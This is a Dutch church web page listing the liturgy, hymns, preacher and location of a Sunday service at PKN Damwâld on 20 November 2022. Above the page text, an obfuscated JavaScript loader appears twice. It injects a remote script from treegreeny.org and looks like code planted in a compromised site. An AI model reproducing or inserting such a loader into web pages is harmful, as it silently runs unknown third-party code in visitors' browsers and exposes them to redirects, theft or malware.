;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 20 november 2022 14:00 uur - PKN Damwâld
zondag 20 november 2022
14:00 uur

Kerkdienst zondag 20 november 2022 14:00 uur

Thema: "Verliezen en winnen"

Informatie

Voorganger:Ds. G. Timmer, Burdaard
Thema:"Verliezen en winnen"
LivestreamDienst terugkijken
Bekijk op Youtube
Liturgie
Lied voor de dienst Elb 223: 1, 2 en 5
Binnenkomst kerkenraad en voorganger
We zingen: NLB 837: 1 en 2
Stil gebed, bemoediging en groet
Deze zondag .....
We zingen: NLB 837: 3 en 4
Gebed
We lezen uit de bijbel: Romeinen 8: 18-39
We zingen: NLB 899: 1 en 3
Verkondiging “Verliezen en winnen”
Muzikaal moment .
We zingen: NLB 641: 1, 2, 3 en 4
Geloofsbelijdenis van Nicea
We zingen: NLB 146: 1 en 3
Dankgebed en voorbeden
We zingen: ELB 125: 1,2 en 3 + refrein
Zegen
Collecte
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Uitganscollecte: Collecte Kerk in Actie